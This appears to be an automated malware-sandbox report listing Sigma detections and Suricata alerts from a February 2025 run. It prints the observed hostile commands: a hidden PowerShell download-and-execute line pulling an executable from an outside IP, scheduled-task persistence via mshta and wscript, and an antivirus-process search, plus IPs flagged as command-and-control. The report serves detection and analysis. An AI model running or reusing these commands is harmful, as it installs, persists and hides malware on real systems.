                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 824, TargetFilename: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE
                                Sigma detected: PowerShell Download Pattern
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
                                Sigma detected: PowerShell Web Download
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
                                Sigma detected: Suspicious Add Scheduled Task Parent
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Macromedia.com F, ParentImage: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com, ParentProcessId: 3540, ParentProcessName: Macromedia.com, ProcessCommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7184, ProcessName: schtasks.exe
                                Sigma detected: Suspicious Copy From or To System Directory
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe, ParentProcessId: 7200, ParentProcessName: 7ecb69d7f1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ProcessId: 5584, ProcessName: cmd.exe
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5600, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 948, ProcessName: schtasks.exe
                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1412, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 2004, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe

                                Data Obfuscation

                                barindex
                                Sigma detected: Powershell download and execute file
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Sigma detected: Search for Antivirus process
                                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5584, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5368, ProcessName: findstr.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:12.935508+010020283713Unknown Traffic192.168.11.2049759172.67.150.254443TCP
                                2025-02-11T09:20:13.703418+010020283713Unknown Traffic192.168.11.2049761172.67.150.254443TCP
                                2025-02-11T09:20:15.472465+010020283713Unknown Traffic192.168.11.2049763172.67.150.254443TCP
                                2025-02-11T09:20:17.093487+010020283713Unknown Traffic192.168.11.2049764172.67.150.254443TCP
                                2025-02-11T09:20:18.796923+010020283713Unknown Traffic192.168.11.2049765172.67.150.254443TCP
                                2025-02-11T09:20:20.831076+010020283713Unknown Traffic192.168.11.2049768172.67.150.254443TCP
                                2025-02-11T09:20:23.001674+010020283713Unknown Traffic192.168.11.2049769172.67.150.254443TCP
                                2025-02-11T09:20:26.426770+010020283713Unknown Traffic192.168.11.2049771172.67.150.254443TCP
                                2025-02-11T09:20:39.498019+010020283713Unknown Traffic192.168.11.2049775104.21.47.135443TCP
                                2025-02-11T09:20:40.221112+010020283713Unknown Traffic192.168.11.2049777104.21.47.135443TCP
                                2025-02-11T09:20:41.371355+010020283713Unknown Traffic192.168.11.2049779104.21.47.135443TCP
                                2025-02-11T09:20:42.703191+010020283713Unknown Traffic192.168.11.2049782104.21.47.135443TCP
                                2025-02-11T09:20:44.096024+010020283713Unknown Traffic192.168.11.2049783104.21.47.135443TCP
                                2025-02-11T09:20:45.528263+010020283713Unknown Traffic192.168.11.2049784172.67.181.243443TCP
                                2025-02-11T09:20:45.540459+010020283713Unknown Traffic192.168.11.2049785104.21.47.135443TCP
                                2025-02-11T09:20:46.248108+010020283713Unknown Traffic192.168.11.2049787172.67.181.243443TCP
                                2025-02-11T09:20:47.260039+010020283713Unknown Traffic192.168.11.2049789104.21.47.135443TCP
                                2025-02-11T09:20:47.573040+010020283713Unknown Traffic192.168.11.2049790172.67.181.243443TCP
                                2025-02-11T09:20:48.852503+010020283713Unknown Traffic192.168.11.2049792172.67.181.243443TCP
                                2025-02-11T09:20:50.092365+010020283713Unknown Traffic192.168.11.2049793172.67.181.243443TCP
                                2025-02-11T09:20:51.428032+010020283713Unknown Traffic192.168.11.2049794172.67.181.243443TCP
                                2025-02-11T09:20:52.384681+010020283713Unknown Traffic192.168.11.2049795104.21.47.135443TCP
                                2025-02-11T09:20:53.019446+010020283713Unknown Traffic192.168.11.2049797172.67.181.243443TCP
                                2025-02-11T09:20:56.229840+010020283713Unknown Traffic192.168.11.2049799172.67.181.243443TCP
                                2025-02-11T09:21:12.530405+010020283713Unknown Traffic192.168.11.204980923.204.173.220443TCP
                                2025-02-11T09:21:33.303874+010020283713Unknown Traffic192.168.11.2049816104.21.112.1443TCP
                                2025-02-11T09:21:34.011989+010020283713Unknown Traffic192.168.11.2049818104.21.112.1443TCP
                                2025-02-11T09:21:35.297202+010020283713Unknown Traffic192.168.11.2049821104.21.112.1443TCP
                                2025-02-11T09:21:36.581573+010020283713Unknown Traffic192.168.11.2049822104.21.112.1443TCP
                                2025-02-11T09:21:37.852590+010020283713Unknown Traffic192.168.11.2049823104.21.112.1443TCP
                                2025-02-11T09:21:39.183574+010020283713Unknown Traffic192.168.11.2049824104.21.112.1443TCP
                                2025-02-11T09:21:40.744357+010020283713Unknown Traffic192.168.11.2049826104.21.112.1443TCP
                                2025-02-11T09:21:44.018508+010020283713Unknown Traffic192.168.11.2049828104.21.112.1443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:19.655295+010020446231A Network Trojan was detected192.168.11.2049812185.215.113.4380TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:06.124657+010020355951Domain Observed Used for C2 Detected159.100.19.1377707192.168.11.2049802TCP
                                2025-02-11T09:21:36.181730+010020355951Domain Observed Used for C2 Detected93.88.203.16956001192.168.11.2049820TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:13.305642+010020546531A Network Trojan was detected192.168.11.2049759172.67.150.254443TCP
                                2025-02-11T09:20:14.565254+010020546531A Network Trojan was detected192.168.11.2049761172.67.150.254443TCP
                                2025-02-11T09:20:27.256204+010020546531A Network Trojan was detected192.168.11.2049771172.67.150.254443TCP
                                2025-02-11T09:20:39.874414+010020546531A Network Trojan was detected192.168.11.2049775104.21.47.135443TCP
                                2025-02-11T09:20:40.896310+010020546531A Network Trojan was detected192.168.11.2049777104.21.47.135443TCP
                                2025-02-11T09:20:45.890262+010020546531A Network Trojan was detected192.168.11.2049784172.67.181.243443TCP
                                2025-02-11T09:20:47.141927+010020546531A Network Trojan was detected192.168.11.2049787172.67.181.243443TCP
                                2025-02-11T09:20:53.230639+010020546531A Network Trojan was detected192.168.11.2049795104.21.47.135443TCP
                                2025-02-11T09:20:57.091377+010020546531A Network Trojan was detected192.168.11.2049799172.67.181.243443TCP
                                2025-02-11T09:21:33.666473+010020546531A Network Trojan was detected192.168.11.2049816104.21.112.1443TCP
                                2025-02-11T09:21:34.863119+010020546531A Network Trojan was detected192.168.11.2049818104.21.112.1443TCP
                                2025-02-11T09:21:44.829264+010020546531A Network Trojan was detected192.168.11.2049828104.21.112.1443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:13.305642+010020498361A Network Trojan was detected192.168.11.2049759172.67.150.254443TCP
                                2025-02-11T09:20:39.874414+010020498361A Network Trojan was detected192.168.11.2049775104.21.47.135443TCP
                                2025-02-11T09:20:45.890262+010020498361A Network Trojan was detected192.168.11.2049784172.67.181.243443TCP
                                2025-02-11T09:21:33.666473+010020498361A Network Trojan was detected192.168.11.2049816104.21.112.1443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:14.565254+010020498121A Network Trojan was detected192.168.11.2049761172.67.150.254443TCP
                                2025-02-11T09:20:40.896310+010020498121A Network Trojan was detected192.168.11.2049777104.21.47.135443TCP
                                2025-02-11T09:20:47.141927+010020498121A Network Trojan was detected192.168.11.2049787172.67.181.243443TCP
                                2025-02-11T09:21:34.863119+010020498121A Network Trojan was detected192.168.11.2049818104.21.112.1443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:33.303874+010020599081Domain Observed Used for C2 Detected192.168.11.2049816104.21.112.1443TCP
                                2025-02-11T09:21:34.011989+010020599081Domain Observed Used for C2 Detected192.168.11.2049818104.21.112.1443TCP
                                2025-02-11T09:21:35.297202+010020599081Domain Observed Used for C2 Detected192.168.11.2049821104.21.112.1443TCP
                                2025-02-11T09:21:36.581573+010020599081Domain Observed Used for C2 Detected192.168.11.2049822104.21.112.1443TCP
                                2025-02-11T09:21:37.852590+010020599081Domain Observed Used for C2 Detected192.168.11.2049823104.21.112.1443TCP
                                2025-02-11T09:21:39.183574+010020599081Domain Observed Used for C2 Detected192.168.11.2049824104.21.112.1443TCP
                                2025-02-11T09:21:40.744357+010020599081Domain Observed Used for C2 Detected192.168.11.2049826104.21.112.1443TCP
                                2025-02-11T09:21:44.018508+010020599081Domain Observed Used for C2 Detected192.168.11.2049828104.21.112.1443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:39.498019+010020599201Domain Observed Used for C2 Detected192.168.11.2049775104.21.47.135443TCP
                                2025-02-11T09:20:40.221112+010020599201Domain Observed Used for C2 Detected192.168.11.2049777104.21.47.135443TCP
                                2025-02-11T09:20:41.371355+010020599201Domain Observed Used for C2 Detected192.168.11.2049779104.21.47.135443TCP
                                2025-02-11T09:20:42.703191+010020599201Domain Observed Used for C2 Detected192.168.11.2049782104.21.47.135443TCP
                                2025-02-11T09:20:44.096024+010020599201Domain Observed Used for C2 Detected192.168.11.2049783104.21.47.135443TCP
                                2025-02-11T09:20:45.540459+010020599201Domain Observed Used for C2 Detected192.168.11.2049785104.21.47.135443TCP
                                2025-02-11T09:20:47.260039+010020599201Domain Observed Used for C2 Detected192.168.11.2049789104.21.47.135443TCP
                                2025-02-11T09:20:52.384681+010020599201Domain Observed Used for C2 Detected192.168.11.2049795104.21.47.135443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:45.528263+010020599261Domain Observed Used for C2 Detected192.168.11.2049784172.67.181.243443TCP
                                2025-02-11T09:20:46.248108+010020599261Domain Observed Used for C2 Detected192.168.11.2049787172.67.181.243443TCP
                                2025-02-11T09:20:47.573040+010020599261Domain Observed Used for C2 Detected192.168.11.2049790172.67.181.243443TCP
                                2025-02-11T09:20:48.852503+010020599261Domain Observed Used for C2 Detected192.168.11.2049792172.67.181.243443TCP
                                2025-02-11T09:20:50.092365+010020599261Domain Observed Used for C2 Detected192.168.11.2049793172.67.181.243443TCP
                                2025-02-11T09:20:51.428032+010020599261Domain Observed Used for C2 Detected192.168.11.2049794172.67.181.243443TCP
                                2025-02-11T09:20:53.019446+010020599261Domain Observed Used for C2 Detected192.168.11.2049797172.67.181.243443TCP
                                2025-02-11T09:20:56.229840+010020599261Domain Observed Used for C2 Detected192.168.11.2049799172.67.181.243443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:12.935508+010020599281Domain Observed Used for C2 Detected192.168.11.2049759172.67.150.254443TCP
                                2025-02-11T09:20:13.703418+010020599281Domain Observed Used for C2 Detected192.168.11.2049761172.67.150.254443TCP
                                2025-02-11T09:20:15.472465+010020599281Domain Observed Used for C2 Detected192.168.11.2049763172.67.150.254443TCP
                                2025-02-11T09:20:17.093487+010020599281Domain Observed Used for C2 Detected192.168.11.2049764172.67.150.254443TCP
                                2025-02-11T09:20:18.796923+010020599281Domain Observed Used for C2 Detected192.168.11.2049765172.67.150.254443TCP
                                2025-02-11T09:20:20.831076+010020599281Domain Observed Used for C2 Detected192.168.11.2049768172.67.150.254443TCP
                                2025-02-11T09:20:23.001674+010020599281Domain Observed Used for C2 Detected192.168.11.2049769172.67.150.254443TCP
                                2025-02-11T09:20:26.426770+010020599281Domain Observed Used for C2 Detected192.168.11.2049771172.67.150.254443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:13.595924+010020446961A Network Trojan was detected192.168.11.2049760185.215.113.4380TCP
                                2025-02-11T09:20:20.255669+010020446961A Network Trojan was detected192.168.11.2049766185.215.113.4380TCP
                                2025-02-11T09:20:26.508138+010020446961A Network Trojan was detected192.168.11.2049770185.215.113.4380TCP
                                2025-02-11T09:20:35.200491+010020446961A Network Trojan was detected192.168.11.2049773185.215.113.4380TCP
                                2025-02-11T09:20:41.068487+010020446961A Network Trojan was detected192.168.11.2049778185.215.113.4380TCP
                                2025-02-11T09:20:47.288344+010020446961A Network Trojan was detected192.168.11.2049788185.215.113.4380TCP
                                2025-02-11T09:20:53.090549+010020446961A Network Trojan was detected192.168.11.2049796185.215.113.4380TCP
                                2025-02-11T09:20:59.877518+010020446961A Network Trojan was detected192.168.11.2049800185.215.113.4380TCP
                                2025-02-11T09:21:07.094153+010020446961A Network Trojan was detected192.168.11.2049803185.215.113.4380TCP
                                2025-02-11T09:21:25.882330+010020446961A Network Trojan was detected192.168.11.2049814185.215.113.4380TCP
                                2025-02-11T09:21:34.357932+010020446961A Network Trojan was detected192.168.11.2049817185.215.113.4380TCP
                                2025-02-11T09:21:41.045667+010020446961A Network Trojan was detected192.168.11.2049825185.215.113.4380TCP
                                2025-02-11T09:21:45.395634+010020446961A Network Trojan was detected192.168.11.2049829185.215.113.4380TCP
                                2025-02-11T09:21:52.025412+010020446961A Network Trojan was detected192.168.11.2049831185.215.113.4380TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:52.018342+010020311981Malware Command and Control Activity Detected192.168.11.2049832109.94.208.205972TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:32.720892+010020599071Domain Observed Used for C2 Detected192.168.11.20499521.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:11.610297+010020594351Domain Observed Used for C2 Detected192.168.11.20606821.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:38.788996+010020599851Domain Observed Used for C2 Detected192.168.11.20632101.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:11.265422+010020594291Domain Observed Used for C2 Detected192.168.11.20547031.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:10.580633+010020594211Domain Observed Used for C2 Detected192.168.11.20521901.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:38.962448+010020599191Domain Observed Used for C2 Detected192.168.11.20526561.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:10.923984+010020594251Domain Observed Used for C2 Detected192.168.11.20548531.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:11.436654+010020594311Domain Observed Used for C2 Detected192.168.11.20520411.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:44.981829+010020599251Domain Observed Used for C2 Detected192.168.11.20550921.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:11.783050+010020594331Domain Observed Used for C2 Detected192.168.11.20605181.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:12.351781+010020599271Domain Observed Used for C2 Detected192.168.11.20638981.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:11.094781+010020594271Domain Observed Used for C2 Detected192.168.11.20516001.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:10.753279+010020597711Domain Observed Used for C2 Detected192.168.11.20496251.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:21.623996+010020480941Malware Command and Control Activity Detected192.168.11.2049768172.67.150.254443TCP
                                2025-02-11T09:20:43.706796+010020480941Malware Command and Control Activity Detected192.168.11.2049782104.21.47.135443TCP
                                2025-02-11T09:20:53.025426+010020480941Malware Command and Control Activity Detected192.168.11.2049797172.67.181.243443TCP
                                2025-02-11T09:21:36.230935+010020480941Malware Command and Control Activity Detected192.168.11.2049821104.21.112.1443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:21:06.124657+010028424781Malware Command and Control Activity Detected159.100.19.1377707192.168.11.2049802TCP
                                2025-02-11T09:21:10.220203+010028424781Malware Command and Control Activity Detected87.120.113.2144449192.168.11.2049808TCP
                                2025-02-11T09:21:18.629337+010028424781Malware Command and Control Activity Detected159.100.19.1377707192.168.11.2049811TCP
                                2025-02-11T09:22:01.765773+010028424781Malware Command and Control Activity Detected87.120.113.2144449192.168.11.2049834TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:04.208402+010028561471A Network Trojan was detected192.168.11.2049756185.215.113.4380TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:13.235597+010028561221A Network Trojan was detected185.215.113.4380192.168.11.2049757TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-11T09:20:07.230588+010028033053Unknown Traffic192.168.11.2049758185.215.113.7580TCP
                                2025-02-11T09:20:14.315068+010028033053Unknown Traffic192.168.11.2049762185.215.113.7580TCP
                                2025-02-11T09:20:20.986423+010028033053Unknown Traffic192.168.11.2049767185.215.113.7580TCP
                                2025-02-11T09:20:27.240530+010028033053Unknown Traffic192.168.11.2049772185.215.113.7580TCP
                                2025-02-11T09:20:35.928430+010028033053Unknown Traffic192.168.11.2049774185.215.113.7580TCP
                                2025-02-11T09:20:41.791338+010028033053Unknown Traffic192.168.11.2049780185.215.113.7580TCP
